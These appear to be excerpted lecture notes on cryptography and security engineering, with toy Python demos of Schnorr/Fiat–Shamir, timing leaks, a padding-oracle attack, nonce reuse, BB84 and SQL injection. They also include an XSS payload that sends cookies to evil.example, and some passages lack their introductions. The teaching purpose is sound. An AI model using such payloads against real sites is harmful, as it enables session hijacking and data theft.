The protocol computes any arithmetic circuit over a finite field using Shamir secret sharing as the underlying primitive. Addition gates are free: given shares \([a]_i, [b]_i\) of secrets \(a, b\), each party computes \([a+b]_i = [a]_i + [b]_i\) locally (no communication needed, since polynomial addition is linear). Multiplication gates are expensive: multiplying two degree-\(t\) Shamir sharings produces a degree-\(2t\) sharing; reducing back to degree \(t\) requires an interactive resharing step (one round of communication).
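The "addition gates are free" property can be demonstrated directly: each party adds its two Shamir shares locally, and the sum reconstructs correctly (toy field and secrets, degree-1 sharings for three parties):

```python
import random

P = 101  # toy field

def share2of3(s):
    """Degree-1 Shamir sharing of s for parties at x = 1, 2, 3."""
    a1 = random.randrange(P)
    return [(x, (s + a1 * x) % P) for x in (1, 2, 3)]

def recon(two_shares):
    """Lagrange interpolation at x = 0 from any two shares."""
    (x1, y1), (x2, y2) = two_shares
    l1 = x2 * pow(x2 - x1, P - 2, P) % P
    l2 = x1 * pow(x1 - x2, P - 2, P) % P
    return (y1 * l1 + y2 * l2) % P

shares_a, shares_b = share2of3(20), share2of3(22)
# Each party adds its two shares locally -- no communication at all
shares_sum = [(x, (ya + yb) % P) for (x, ya), (_, yb) in zip(shares_a, shares_b)]
```

Multiplication offers no such shortcut: multiplying share values pointwise doubles the polynomial degree, which is exactly why BGW needs an interactive resharing step there.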
Internet Censorship Architecture
National censorship systems combine multiple techniques:
- DNS hijacking/poisoning: return false IP addresses for blocked domains
- IP blocking: block packets to/from specific IP ranges
- Keyword filtering via DPI: inspect packet payloads for banned strings; discard or reset connections
- BGP route injection: divert traffic at the routing level
The GFW (Great Firewall of China) actively probes suspected circumvention servers: when an obfs4 bridge is discovered, the GFW initiates a connection and characterises the handshake to identify the protocol. Defences must maintain cryptographic undetectability of the circumvention handshake.
Censorship measurement platforms (OONI — Open Observatory of Network Interference) deploy probes in censored networks to document what is blocked and how.
Surveillance Capitalism and Tracking
Shoshana Zuboff’s concept of surveillance capitalism describes how companies collect behavioural data as a raw material, refine it into predictive products, and sell predictions to advertisers and other buyers — creating incentives to maximise data collection.
Third-party tracking: websites load resources from tracking domains (Google Analytics, Facebook Pixel); these third parties observe browsing behaviour across sites via cookies. Browser fingerprinting identifies users without cookies using the combination of browser version, fonts, canvas rendering, and dozens of other attributes — largely stateless and unkillable by cookie blocking. Supercookies use browser storage mechanisms (localStorage, IndexedDB, HSTS cache) that survive cookie clearing.
GDPR (EU, 2018) and CCPA (California, 2020) mandate consent for data collection, data subject access rights, and the right to erasure. Enforcement has been uneven; individual GDPR fines have ranged from hundreds of millions of euros to over a billion (Meta: €1.2B in 2023).
Chapter 9: Privacy Regulations and Re-identification Research
Privacy Regulation Landscape
The legal framework for data privacy has developed unevenly across jurisdictions, creating a patchwork of obligations that multinational organisations must navigate simultaneously.
GDPR (General Data Protection Regulation), effective May 2018 in the European Union, is the most comprehensive and influential privacy law currently in force. It applies to any organisation that processes personal data of EU residents, regardless of where the organisation is based. Core principles: (1) lawfulness, fairness, and transparency — processing requires a legal basis, most often consent or legitimate interest; (2) purpose limitation — data collected for one purpose may not be repurposed without fresh legal basis; (3) data minimisation — only the minimum data necessary for the stated purpose may be collected; (4) accuracy, storage limitation, integrity and confidentiality. Data subjects hold several rights: the right of access (obtain a copy of their data), the right to rectification (correct inaccurate data), the right to erasure (“right to be forgotten”), the right to portability (receive data in a machine-readable format), and the right to object to automated decision-making. Fines reach up to 4% of annual global turnover or €20M, whichever is greater. The GDPR has prompted significant structural changes: cookie consent banners, data protection officers, privacy impact assessments, and cross-border data transfer mechanisms (Standard Contractual Clauses, now under the EU-US Data Privacy Framework after Schrems II invalidated Privacy Shield in 2020).
CCPA (California Consumer Privacy Act), effective January 2020 (strengthened by CPRA in 2023), grants California residents the right to know what personal information is collected, the right to opt out of the sale of personal information to third parties, the right to deletion, and the right to non-discrimination for exercising these rights. Unlike GDPR, CCPA does not require a legal basis for processing — it operates as an opt-out regime rather than opt-in. CCPA covers businesses with over $25M in annual revenue, or those that buy/sell data on 50,000+ consumers, or derive 50%+ of revenue from selling data.
COPPA (Children’s Online Privacy Protection Act), effective since 2000 in the United States, prohibits collecting personal information from children under 13 without verifiable parental consent. Operators of websites and online services directed at children must post privacy notices, provide parents with access to and the ability to delete their child’s data, and cannot condition participation on disclosure of more information than necessary. The FTC actively enforces COPPA; YouTube was fined $170M in 2019 for collecting data on child users without consent.
If personal data is written to a public blockchain (for example, a user’s name or medical record hash embedded in a transaction), it cannot be “erased” in any GDPR-compliant sense. Proposed mitigations include: (1) storing personal data off-chain and putting only a cryptographic hash on-chain (but the hash itself may constitute personal data under GDPR, particularly if it is linkable to an individual); (2) crypto-shredding — encrypting the data with a key stored off-chain and then deleting the key, rendering the on-chain ciphertext meaningless without technically removing it (regulators have not uniformly accepted this as genuine erasure); (3) using permissioned blockchains with a central administrator who can redact records (which undermines decentralisation). This tension is a fundamental architectural incompatibility, not a solvable engineering problem. Organisations building blockchain-based systems that handle personal data of EU residents must design carefully to avoid storing personal data on-chain in the first place.
Re-identification Research
The field of re-identification research studies the gap between the formal notion of “anonymised data” and the practical reality of what auxiliary information an adversary can exploit.
Sweeney did not merely compute statistics. She demonstrated the attack concretely: she purchased the Massachusetts Group Insurance Commission hospital discharge dataset, which contained patients’ ZIP codes, birthdates, genders, and medical diagnoses (but not names — the state had “anonymised” the data by removing direct identifiers). She separately purchased the Cambridge, MA voter registration rolls, which contained names, ZIP codes, birthdates, and genders. By joining the two datasets on (ZIP, gender, birthdate), she identified the complete medical record — diagnoses, prescriptions, and physician notes — of the Governor of Massachusetts, William Weld, and mailed it to him.
The immediate policy consequence was the HIPAA (Health Insurance Portability and Accountability Act) Safe Harbour provision, which defines 18 specific data elements that must be removed or generalised before health data can be considered de-identified for purposes of research sharing: name, geographic subdivisions smaller than state, dates more specific than year, phone numbers, fax numbers, email addresses, SSN, medical record numbers, health plan beneficiary numbers, account numbers, certificate and license numbers, VINs, device serial numbers, URLs, IP addresses, biometric identifiers, full-face photographs, and any other unique identifying numbers. The Safe Harbour provision operationalises the lesson: the joint distribution of innocuous-seeming demographic attributes uniquely identifies individuals at scale.
The attack required only a target's public IMDb ratings page (ratings are public for users who post them on IMDb) and a Bayesian matching procedure that tolerated noise in the Netflix dataset. In experiments with about 50 users with known IMDb profiles, they correctly identified 68% using only 2 movies with approximate dates, and over 99% with 8 movies. Netflix had originally planned a second data release; the research led them to cancel it. The Federal Trade Commission subsequently cited this work in regulatory guidance, and it became a touchstone for the inadequacy of naive anonymisation.
The lesson extends beyond Netflix. It is now understood that the set of attributes that constitute quasi-identifiers cannot be enumerated in advance, because auxiliary datasets are unbounded — any combination of released attributes might be linkable to some auxiliary source. This is precisely what differential privacy addresses: its guarantee holds regardless of what auxiliary information the adversary possesses, because it bounds the privacy loss in terms of adjacent databases, not in terms of an enumerated quasi-identifier set.
Chapter 10: Zero-Knowledge Proofs
A zero-knowledge proof (ZKP) is an interactive or non-interactive protocol in which a prover convinces a verifier that a statement is true without revealing why it is true — that is, without revealing any witness or secret beyond the truth of the statement itself. ZKPs are among the most important cryptographic primitives, with applications ranging from authentication protocols to blockchain privacy (zk-SNARKs in Zcash and Ethereum rollups).
10.1 Definition and Properties
- Completeness: if the statement \(x \in L\) is true, an honest prover with witness \(w\) convinces the verifier — \(\Pr[\text{V accepts}] = 1\).
- Soundness: if \(x \notin L\), no cheating prover (even a computationally unbounded one) can convince the verifier, except with negligible soundness error \(\epsilon\).
- Zero-knowledge: there exists a probabilistic polynomial-time simulator S such that, for any \(x \in L\), the output of \(S(x)\) is computationally indistinguishable from the transcript of an honest execution (P(x,w), V(x)). Since S has no witness, this formalises that the verifier learns nothing beyond \(x \in L\).
The simulator exists because every transcript can be simulated — any verifier strategy could have generated the same-looking transcript on its own, without learning any secret from the actual interaction. The zero-knowledge property is a rigorous formalisation of “nothing extra is revealed.”
10.2 Schnorr Identification Protocol
The Schnorr protocol (1989) is the prototype interactive ZKP. It proves knowledge of a discrete logarithm:
Statement: I know \(x\) such that \(h = g^x\) in a group \(\mathbb{G}\) of prime order \(q\).
- Commit: Prover picks random \(r \leftarrow \mathbb{Z}_q\), sends \(R = g^r\) (commitment).
- Challenge: Verifier picks random \(c \leftarrow \mathbb{Z}_q\) and sends \(c\).
- Response: Prover computes \(s = r + cx \bmod q\) and sends \(s\).
- Verify: Verifier accepts iff \(g^s = R \cdot h^c\).
Worked example in \(\mathbb{Z}_{11}^*\) with \(g = 2\) (order 10; a toy group for illustration, since real deployments use a prime-order group): the prover knows \(x = 3\), so \(h = 2^3 = 8\). Commit: \(r = 4\), \(R = 2^4 \equiv 5\). Challenge: \(c = 2\). Response: \(s = r + cx = 4 + 6 \equiv 0 \pmod{10}\). Verify: \(g^s = 2^0 = 1\), and \(R \cdot h^c = 5 \cdot 8^2 = 5 \cdot 64 \equiv 5 \cdot 9 = 45 \equiv 1 \pmod{11}\). ✓
Security: The commitment \(R = g^r\) uses fresh randomness every session; without knowing \(r\), no eavesdropper can compute \(x\) from \((R, c, s)\) — this would require solving DLOG. The zero-knowledge property holds because the simulator can produce valid-looking transcripts by picking \(s\) and \(c\) first, then computing \(R = g^s/h^c\) — bypassing the need to know \(x\).
10.3 Fiat–Shamir Heuristic: Non-Interactive ZKPs
The Fiat–Shamir transform converts an interactive ZKP (Schnorr-type) into a non-interactive proof by replacing the random verifier challenge with a hash of the transcript so far:
Fiat–Shamir proofs are digital signatures in disguise: Schnorr + Fiat–Shamir = Schnorr signatures. The security of the Fiat–Shamir transform relies on the random oracle model for \(H\); counterexamples show it can fail for arbitrary interactive proofs when \(H\) is instantiated with a concrete hash function (Goldwasser–Kalai 2003), but it is secure in the random oracle model for Schnorr-like sigma protocols.
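A sketch of the transform applied to Schnorr, with toy group parameters chosen for readability (real systems use large prime-order groups):

```python
import hashlib, random

# Toy Schnorr group: g = 2 has prime order q = 11 in Z_23^*
p, q, g = 23, 11, 2

def H(*vals):
    """Fiat-Shamir challenge: hash of the transcript, reduced mod q."""
    data = b"|".join(str(v).encode() for v in vals)
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % q

def prove(x):
    h = pow(g, x, p)        # public statement: h = g^x
    r = random.randrange(q)
    R = pow(g, r, p)        # commitment
    c = H(g, h, R)          # challenge comes from the hash, not a verifier
    s = (r + c * x) % q     # response
    return h, (R, s)

def verify(h, proof):
    R, s = proof
    c = H(g, h, R)
    return pow(g, s, p) == R * pow(h, c, p) % p
```

The proof \((R, s)\) is a single string anyone can check offline — no interaction, which is exactly what makes it usable as a signature scheme.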
10.4 zk-SNARKs and Succinct Proofs
A zk-SNARK (Zero-Knowledge Succinct Non-Interactive Argument of Knowledge) is a non-interactive ZKP where the proof size and verification time are both very small (constant or logarithmic in the circuit size), enabling proof of arbitrary NP statements:
- Succinctness: proof size is \(O(\lambda)\) or \(O(\text{poly}(\lambda) \log N)\), independent (or nearly so) of the statement size \(N\).
- Non-interactivity: a single proof string suffices (no rounds).
- Argument of knowledge: a cheating prover cannot produce an accepting proof without knowing the witness (under cryptographic assumptions).
- Zero-knowledge: the proof reveals nothing beyond statement validity.
The Groth16 zk-SNARK (2016) produces proofs of 3 group elements regardless of the computation size, verifiable in milliseconds. It powers Zcash’s shielded transactions: a user proves knowledge of a spending key and consistency of transaction amounts without revealing either. Ethereum Layer-2 rollups (zkSync, StarkNet) use zk-SNARKs/STARKs to prove correct execution of thousands of transactions in a single on-chain proof, reducing gas costs by 10–100×.
Chapter 11: Side-Channel Attacks
Side-channel attacks exploit information leaked through the physical implementation of a cryptographic algorithm — timing, power consumption, electromagnetic radiation, or acoustic emanations — rather than weaknesses in the algorithm itself. Mathematically perfect algorithms can be completely broken by side-channel attacks on their implementations.
11.1 Timing Attacks
Timing attacks (Kocher 1996) exploit the fact that many implementations take variable time depending on secret data. RSA implemented with a simple square-and-multiply loop that skips the “multiply” step when a key bit is 0 leaks the key bit through the timing difference.
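The leak is easy to see in code. The sketch below counts multiplications in a naive square-and-multiply loop, then shows the always-multiply countermeasure (illustrative only; real constant-time code also avoids secret-dependent branches and memory accesses):

```python
def modexp_leaky(base, exp, mod):
    """Left-to-right square-and-multiply; multiplies ONLY when the key bit is 1,
    so running time (multiplication count) leaks the bit pattern of `exp`."""
    result, mults = 1, 0
    for bit in bin(exp)[2:]:
        result = result * result % mod        # always square
        if bit == "1":
            result = result * base % mod      # secret-dependent work
            mults += 1
    return result, mults

def modexp_constant_ops(base, exp, mod, nbits):
    """Same exponentiation with a multiply on every iteration (dummy when bit = 0)."""
    result = 1
    for i in range(nbits - 1, -1, -1):
        result = result * result % mod
        candidate = result * base % mod       # always multiply
        result = candidate if (exp >> i) & 1 else result  # real code: branchless select
    return result
```

In the leaky version, the multiplication count equals the Hamming weight of the exponent; an attacker measuring per-iteration timing recovers individual bits.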
Kocher’s original attack (1996) recovered 512-bit and 1024-bit RSA private keys from timing measurements of a smart card, using approximately 300,000 queries. The attack is a statistical estimation problem: for each candidate bit value, the predicted timing for a batch of known plaintexts is computed; the correlation between predicted and measured times reveals the true bit.
The countermeasure is Montgomery multiplication with constant-time implementation: perform the multiplication in every step regardless of the key bit (using dummy operations or always-on multiply), and ensure that the code executes in constant time by removing all data-dependent branches and memory accesses. Modern cryptographic libraries (BoringSSL, mbedTLS) implement RSA in constant time; failure to do so has resulted in critical vulnerabilities (Lucky13, ROBOT).
11.2 Power Analysis Attacks
Simple Power Analysis (SPA) reads a single power trace and identifies operations (squarings vs. multiplications) by visual inspection. Differential Power Analysis (DPA) (Kocher, Jaffe, Jun 1999) uses statistical analysis of many power traces to recover AES keys, correlating hypothesised key-dependent intermediate values with the measured power consumption.
11.3 Spectre and Meltdown: Microarchitectural Side Channels
Modern processors execute instructions speculatively and out-of-order for performance. Meltdown (Lipp et al., 2018) and Spectre (Kocher et al., 2018) are microarchitectural side-channel attacks that exploit this speculation:
Meltdown: The CPU transiently (speculatively) executes memory accesses to kernel memory before the memory-protection fault is delivered, leaving traces in the CPU cache. An attacker reads these traces via a cache timing side channel (Flush+Reload): measure which cache lines are warm to determine which kernel memory address was transiently loaded. This allows any user-space process to read all of kernel memory. Patched by kernel page-table isolation (KPTI), which unmaps the kernel’s page tables during user-space execution at a 5–30% performance cost.
Spectre: Tricks the CPU’s branch predictor into speculatively executing code it should not execute, leaking information from across security boundaries (e.g., from another process or from the hypervisor). Unlike Meltdown (patched in hardware and OS), Spectre variants remain fundamentally difficult to patch because they exploit the inherent CPU optimisation of speculative execution.
Chapter 12: Applied Cryptography Engineering
Cryptographic algorithms are only as secure as their implementations. This chapter surveys common implementation pitfalls and the engineering principles that prevent them.
12.1 Padding Oracle Attacks
A padding oracle attack (Vaudenay 2002) exploits a server that reports whether a decrypted ciphertext has valid PKCS#7 padding — a single bit of information — to decrypt arbitrary ciphertexts.
POODLE (2014) exploited this against SSLv3 CBC; Lucky13 (2013) exploited the timing difference in HMAC verification in TLS 1.0/1.1. The correct fix is Encrypt-then-MAC: compute the MAC over the ciphertext, and verify the MAC in constant time before decrypting. If the MAC fails, reject immediately — the recipient never decrypts, so there is no padding oracle. AEAD modes (AES-GCM) are immune by construction.
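The attack logic can be sketched end-to-end with a toy "block cipher" (a keyed XOR mask — completely insecure, but it preserves the CBC structure the attack exploits). The oracle reveals one bit per query, and at most 256 queries recover a plaintext byte:

```python
import hashlib

BLOCK = 16

def _mask(key):
    return hashlib.sha256(key).digest()[:BLOCK]   # toy "cipher": fixed keyed XOR

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _pad(m):
    k = BLOCK - len(m) % BLOCK
    return m + bytes([k]) * k                     # PKCS#7

def cbc_encrypt(key, iv, m):
    padded, out, prev = _pad(m), b"", iv
    for i in range(0, len(padded), BLOCK):
        c = _xor(_xor(padded[i:i + BLOCK], prev), _mask(key))
        out, prev = out + c, c
    return out

def padding_oracle(key, iv, ct):
    """True iff the decryption ends in valid PKCS#7 padding -- the leaked bit."""
    pt, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        pt += _xor(_xor(ct[i:i + BLOCK], _mask(key)), prev)
        prev = ct[i:i + BLOCK]
    k = pt[-1]
    return 1 <= k <= BLOCK and pt[-k:] == bytes([k]) * k

def recover_last_byte(oracle, c_prev, c_target):
    """Recover the last plaintext byte of c_target using only the oracle."""
    for guess in range(256):
        forged = c_prev[:-1] + bytes([guess])
        if oracle(forged + c_target):
            # rule out accidental \x02\x02-style padding by disturbing byte -2
            forged2 = forged[:-2] + bytes([forged[-2] ^ 1]) + forged[-1:]
            if oracle(forged2 + c_target):
                return guess ^ 0x01 ^ c_prev[-1]   # decrypted last byte was 0x01
    raise RuntimeError("no valid padding found")
```

The same loop, repeated per byte and per block, decrypts the entire message — which is why "padding invalid" error messages (or their timing) must never be distinguishable.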
12.2 Nonce Reuse and Its Consequences
Many AEAD modes require a unique nonce (number used once) per encryption under a given key. Nonce reuse is catastrophic:
- AES-GCM nonce reuse: if two messages \(m_1, m_2\) are encrypted under the same (key, nonce) pair in GCM, the XOR of the ciphertexts equals the XOR of the plaintexts: \(c_1 \oplus c_2 = m_1 \oplus m_2\). Knowing either message immediately reveals the other. Worse, the authentication key \(H\) can be recovered from the two authentication tags, allowing the attacker to forge arbitrary authenticated ciphertexts indefinitely. The same class of failure broke the PS3's firmware-signing key (Sony used a constant nonce \(k\) in ECDSA, the signature analogue of nonce reuse, allowing the private key to be recovered) and various TLS implementations that repeated GCM nonces.
The lesson: nonce management is a primary engineering concern. Use XChaCha20-Poly1305 (extended nonce, safe for random generation even at scale) or AES-SIV (deterministic AEAD, produces identical ciphertexts for identical plaintexts but is nonce-misuse resistant) for contexts where nonce uniqueness cannot be guaranteed.
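The two-time-pad consequence of nonce reuse is easy to demonstrate. The keystream function below is a stand-in (a hash-based CTR sketch, not real AES-GCM), but the cancellation is identical in any stream-cipher mode:

```python
import hashlib

def keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    # Toy CTR-style keystream for illustration; GCM derives its keystream
    # from AES, but the reuse consequence is the same.
    out = b""
    ctr = 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

key, nonce = b"k" * 16, b"n" * 12          # the bug: nonce reused
m1 = b"attack at dawn!!"
m2 = b"retreat at nine!"
c1 = xor(m1, keystream(key, nonce, len(m1)))
c2 = xor(m2, keystream(key, nonce, len(m2)))

# The repeated keystream cancels: ciphertext XOR reveals plaintext XOR.
assert xor(c1, c2) == xor(m1, m2)
# Knowing m1 therefore recovers m2 outright, with no key material:
assert xor(xor(c1, c2), m1) == m2
```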
12.3 Length Extension Attacks on Hash Functions
MD5 and SHA-1/SHA-2 use the Merkle–Damgård construction: the hash is computed by initialising a state with a fixed IV and repeatedly applying a compression function to successive message blocks. Given \(H(m)\) and \(\text{len}(m)\), an attacker can compute \(H(m \| \text{padding} \| m')\) for any extension \(m'\) without knowing \(m\). This breaks the naive MAC construction \(\text{MAC}(k, m) = H(k \| m)\): knowing the tag on \(m\) allows forging the tag on \(m \| \text{padding} \| m'\).
The fix is HMAC: \(\text{HMAC}(k, m) = H\big((k \oplus \texttt{opad}) \,\|\, H((k \oplus \texttt{ipad}) \,\|\, m)\big)\). The nested (double) hashing prevents length extension. SHA-3 (Keccak) uses a sponge construction rather than Merkle–Damgård and is immune to length extension by design.
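A minimal contrast between the unsafe \(H(k \| m)\) construction and HMAC, using Python's standard library (the key and message here are made up):

```python
import hashlib
import hmac

key = b"secret-key"
msg = b"amount=100&to=alice"

# Vulnerable construction: H(k || m) admits length extension on any
# Merkle-Damgard hash (MD5, SHA-1, SHA-2) -- an attacker who sees this
# tag can forge a tag on msg || padding || suffix without the key.
naive_tag = hashlib.sha256(key + msg).hexdigest()

# HMAC's nested construction blocks length extension.
tag = hmac.new(key, msg, hashlib.sha256).hexdigest()

def verify(key: bytes, msg: bytes, tag: str) -> bool:
    expected = hmac.new(key, msg, hashlib.sha256).hexdigest()
    # Constant-time comparison, never `==`, to avoid leaking how many
    # leading tag bytes matched via timing.
    return hmac.compare_digest(expected, tag)

assert verify(key, msg, tag)
```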
Chapter 13: Quantum Cryptography
Classical cryptography relies on computational hardness assumptions: problems like integer factorisation are believed to be hard for classical computers, but Shor’s algorithm solves them in polynomial time on a quantum computer. Quantum cryptography offers two distinct responses to this threat: (1) protocols whose security is based on the laws of physics rather than computational hardness, and (2) post-quantum cryptography (classical algorithms believed to be hard for both classical and quantum computers — already covered in the companion CO 485 notes).
13.1 BB84 Quantum Key Distribution
The BB84 protocol (Bennett and Brassard, 1984) is the first and most studied quantum key distribution (QKD) scheme. It allows two parties, Alice and Bob, to establish a shared secret key with security guaranteed by the laws of quantum mechanics, not computational assumptions. Alice encodes each random bit as the polarisation of a single photon, choosing one of two bases at random for each bit:
- Rectilinear basis (+): horizontal polarisation = 0, vertical = 1.
- Diagonal basis (×): 45° polarisation = 0, 135° = 1.
Bob measures each incoming photon in a basis chosen independently at random. Alice and Bob then publicly compare their basis choices (but not the bit values) and discard the positions where the bases differ; the surviving bits form the sifted key.
13.2 Security of BB84
The security of BB84 follows from two principles of quantum mechanics:
No-cloning theorem: an unknown quantum state cannot be copied. An eavesdropper Eve cannot clone the photon, measure it, and forward the original — she must interact with the photon and thereby disturb it.
Measurement disturbs state: measuring a photon in the wrong basis produces a random result and collapses the state, so Eve's interception introduces errors in Bob's measurements. If Eve intercepts every photon (measuring in a random basis and resending), she introduces a 25% quantum bit error rate (QBER) in the sifted key. Aborting at an 11% QBER threshold therefore detects Eve even if she intercepts only 44% of the photons. The information-theoretic security proofs (Lo and Chau 1999; Shor and Preskill 2000) show that BB84 is unconditionally (indeed composably) secure against arbitrary quantum eavesdropping, with the extractable key length depending only on the observed QBER.
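The 25% QBER figure can be checked with a small classical simulation of the intercept-resend attack (this sketches the protocol's bookkeeping only — random bases, sifting, error counting — not the underlying quantum physics):

```python
import random

def bb84_qber(n: int, eve: bool = False, seed: int = 0) -> float:
    """Simulate BB84 sifting and return the QBER on the sifted key."""
    rng = random.Random(seed)
    alice_bits  = [rng.randint(0, 1) for _ in range(n)]
    alice_bases = [rng.choice("+x") for _ in range(n)]
    photons = list(zip(alice_bits, alice_bases))

    if eve:
        # Intercept-resend: Eve measures each photon in a random basis
        # (random outcome if her basis is wrong) and resends in HER basis.
        eve_bases = [rng.choice("+x") for _ in range(n)]
        photons = [(bit if eb == basis else rng.randint(0, 1), eb)
                   for (bit, basis), eb in zip(photons, eve_bases)]

    bob_bases = [rng.choice("+x") for _ in range(n)]
    # Measuring in the photon's basis returns its bit; otherwise random.
    bob_bits = [bit if bb == basis else rng.randint(0, 1)
                for (bit, basis), bb in zip(photons, bob_bases)]

    # Sifting: keep only positions where Alice's and Bob's bases agree.
    sifted = [(a, b) for a, ab, b, bb in
              zip(alice_bits, alice_bases, bob_bits, bob_bases) if ab == bb]
    return sum(a != b for a, b in sifted) / len(sifted)

assert bb84_qber(2000) == 0.0                     # no Eve: error-free
assert 0.15 < bb84_qber(4000, eve=True) < 0.35    # Eve: QBER near 25%
```

Without Eve the sifted key is exactly error-free; with intercept-resend, Eve guesses the wrong basis half the time, and half of those positions flip Bob's bit, giving the expected 25% QBER.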
In practice, QKD implementations face several attacks and limitations:
- Photon number splitting attacks: practical laser sources emit multi-photon pulses with some probability. Eve can split off one photon from a multi-photon pulse and store it until the basis is announced, then measure in the correct basis. This bypasses the no-cloning argument. The decoy-state method (Hwang 2003; Lo et al. 2005) uses random pulse intensities to detect photon-splitting attacks.
- Distance limitation: the fraction of photons surviving an optical fibre decays exponentially with distance (attenuation ~0.2 dB/km for telecom fibre). Commercial QKD systems (Toshiba, ID Quantique) operate up to ~100 km without quantum repeaters; the Chinese Micius satellite demonstrated 1200 km ground-to-satellite QKD in 2017.
- Side channels in the hardware: QKD implementations have been broken by side-channel attacks on the detectors (detector blinding attacks, time-shift attacks). The device-independent QKD (DI-QKD) model closes these loopholes but requires near-perfect Bell inequality violation, currently impractical.
Chapter 14: Threat Modelling and Security Engineering
Cryptographic primitives are only components of secure systems. This chapter discusses how to reason about security at the system level: identifying what needs to be protected, from whom, and how.
14.1 STRIDE Threat Modelling
The STRIDE model (Microsoft, Shostack 2014) systematically enumerates threats along six dimensions:
- Spoofing identity: an attacker impersonates a legitimate user or system. Countermeasure: strong authentication (passwords, 2FA, mutual TLS).
- Tampering with data: unauthorised modification of data in transit or at rest. Countermeasure: integrity checks (HMAC, digital signatures, filesystem integrity monitoring).
- Repudiation: a user or system denies performing an action. Countermeasure: audit logs, digital signatures (non-repudiation).
- Information disclosure: confidential data is exposed. Countermeasure: encryption, access control, data classification.
- Denial of service: a system is made unavailable. Countermeasure: rate limiting, load balancing, DDoS mitigation.
- Elevation of privilege: attacker gains higher access than authorised. Countermeasure: least privilege, privilege separation, sandboxing.
14.2 Attack Trees and Kill Chains
An attack tree decomposes a top-level security goal into subgoals using AND/OR decomposition. The root is the attacker’s goal; leaves are primitive attacks. AND nodes require all children; OR nodes require at least one. Attack trees enable systematic enumeration of attack paths and assignment of cost, probability, or detection difficulty to each leaf.
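A minimal attack-tree evaluator can make the AND/OR semantics concrete. The sketch below minimises attacker cost (an OR node costs its cheapest child, an AND node the sum of its children); the tree, node names, and costs are hypothetical, and real analyses may propagate probability or detection difficulty instead:

```python
from dataclasses import dataclass, field

@dataclass
class Node:
    name: str
    kind: str = "leaf"          # "leaf", "and", or "or"
    cost: float = 0.0           # attacker cost, used only for leaves
    children: list = field(default_factory=list)

def min_cost(n: Node) -> float:
    """Cheapest attack path: OR = min over children, AND = sum of children."""
    if n.kind == "leaf":
        return n.cost
    costs = [min_cost(c) for c in n.children]
    return sum(costs) if n.kind == "and" else min(costs)

# Hypothetical tree for the goal "read a user's mail".
tree = Node("read mail", "or", children=[
    Node("phish password", cost=100),
    Node("compromise server", "and", children=[
        Node("find RCE bug", cost=5000),
        Node("evade EDR", cost=2000),
    ]),
])

assert min_cost(tree) == 100   # cheapest path: phishing
```

The same recursion, with `min`/`sum` swapped for other combiners, yields probability-of-success or minimum-detection analyses over the identical tree structure.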
The cyber kill chain (Lockheed Martin 2011) models advanced persistent threats as a sequence of stages: Reconnaissance → Weaponisation → Delivery → Exploitation → Installation → Command and Control → Actions on Objectives. Breaking the kill chain at any stage (e.g., detecting the C&C beaconing before exfiltration) defeats the attack. This stage-based model underlies modern security operations centre (SOC) playbooks and SIEM (Security Information and Event Management) alerting logic.
14.3 Defence in Depth
Defence in depth is the security architecture principle of deploying multiple independent layers of security controls so that the failure of any single control does not result in total compromise. Each layer assumes the outer layers may have already failed:
- Network layer: firewalls, network segmentation, IDS/IPS.
- Host layer: endpoint detection and response (EDR), host firewalls, OS hardening, full-disk encryption.
- Application layer: input validation, output encoding (preventing XSS, SQL injection), CSRF tokens, security headers.
- Identity layer: MFA, privileged access management (PAM), just-in-time access.
- Data layer: encryption at rest, tokenisation of sensitive fields (e.g., PAN data), data loss prevention (DLP).
- Process layer: security awareness training, patch management, incident response planning, penetration testing.
14.4 Common Vulnerability Patterns
SQL Injection (SQLi): User-supplied input is concatenated directly into an SQL query. The attacker provides input that alters the query structure, extracting the entire database or bypassing authentication. Prevention: parameterised queries (prepared statements) in which user input is always treated as data, never as SQL syntax.
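The difference is easy to demonstrate with Python's built-in sqlite3 module (the table and payload here are toy examples):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 1), ('bob', 0)")

evil = "' OR '1'='1"   # classic injection payload

# VULNERABLE: string concatenation lets the input alter query structure.
# The query becomes  WHERE name = '' OR '1'='1'  -- always true, so
# every row is returned.
rows = conn.execute(
    "SELECT name FROM users WHERE name = '" + evil + "'").fetchall()
assert len(rows) == 2

# SAFE: a parameterised query treats the input strictly as data; the
# payload is just an odd-looking username that matches nothing.
rows = conn.execute(
    "SELECT name FROM users WHERE name = ?", (evil,)).fetchall()
assert rows == []
```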
Cross-site scripting (XSS): A web application echoes user input in a page without sanitisation; an attacker injects <script> tags that execute in victims’ browsers. Consequences: cookie theft (session hijacking), defacement, phishing. Prevention: context-sensitive output encoding (HTML encode <, >, &, " before rendering in HTML context) and Content Security Policy (CSP) headers.
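A minimal illustration of output encoding in the HTML-text context, using Python's `html.escape` (the payload and page template are hypothetical):

```python
import html

user_input = '<script>document.location="//evil.example/?c="+document.cookie</script>'

# Reflecting user_input verbatim would execute the script in the
# victim's browser. HTML-encoding <, >, &, " and ' renders it inert:
# the browser displays the payload as text instead of parsing it.
safe = html.escape(user_input, quote=True)
page = f"<p>You searched for: {safe}</p>"

assert "<script>" not in page
assert "&lt;script&gt;" in page
```

Note that this encoding is only correct for the HTML-text context; attribute, URL, and JavaScript contexts each need their own encoder, which is why the section calls the defence context-sensitive.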
Insecure deserialisation: Applications deserialise user-controlled data using language-native object serialisation (Java, PHP, Python pickle). Attackers craft malicious payloads that, when deserialised, execute arbitrary code via gadget chains in the application’s class path. Prevention: never deserialise from untrusted sources; use data-only formats (JSON, Protocol Buffers) instead of object serialisation.
SSRF (Server-Side Request Forgery): An application makes HTTP requests to URLs controlled by the user, allowing an attacker to probe internal network services (AWS metadata endpoint at 169.254.169.254, Redis, internal admin APIs) that are inaccessible from the public internet. The Capital One breach (2019) exploited an SSRF in a WAF to extract AWS IAM credentials from the instance metadata endpoint, compromising 100 million customer records.
These four vulnerability classes — SQLi, XSS, insecure deserialisation, SSRF — recur across editions of the OWASP Top 10. Understanding their root cause (failure to separate code from data) is more valuable than memorising specific payloads.
Chapter 15: Formal Security Proofs and Reduction-Based Cryptography
